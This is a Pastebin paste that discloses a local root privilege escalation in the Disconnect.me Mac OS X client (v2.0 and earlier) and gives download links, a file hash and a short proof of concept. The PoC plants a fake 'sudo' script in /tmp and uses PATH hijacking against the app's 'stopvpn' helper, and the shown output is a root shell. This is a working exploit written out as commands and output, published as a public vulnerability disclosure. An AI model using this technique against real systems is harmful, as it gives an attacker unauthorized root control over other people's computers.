API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Sep 1st, 2015
1,200
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.79 KB | None | 0 0
raw download clone embed print report
  1. Disconnect.me is the search engine entrusted by the Tor Browser.
  2.  
  3. Unfortunately, the Mac OS X client has an LPE to root vulnerability (0day).
  4.  
  5. Original Download <= v2.0: https://disconnect.me/premium/mac
  6.  
  7. Archived Download: http://d-h.st/LKqG
  8.  
  9. Disconnect+Desktop.pkg: sha256 = bc94c94c88eb5c138396519ff994ae8efe85899475f44e54f71a6ebc047ce4e7
  10.  
  11. https://www.virustotal.com/en/file/bc94c94c88eb5c138396519ff994ae8efe85899475f44e54f71a6ebc047ce4e7/analysis/
  12.  
  13. PoC:
  14. """
  15. $ id
  16. uid=501(...) gid=20(staff) ...
  17. $ cat /tmp/sudo
  18. #!/bin/bash
  19. /usr/bin/id
  20. /bin/bash
  21. $ chmod +x /tmp/sudo
  22. $ PATH=/tmp "/Library/Application Support/disconnect/stopvpn"
  23. uid=0(root) gid=0(wheel) ...
  24. # /usr/bin/whoami
  25. root
  26. """
  27.  
  28. --
  29. Kristian Erik Hermansen (@h3rm4ns3c)
  30. https://www.linkedin.com/in/kristianhermansen
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!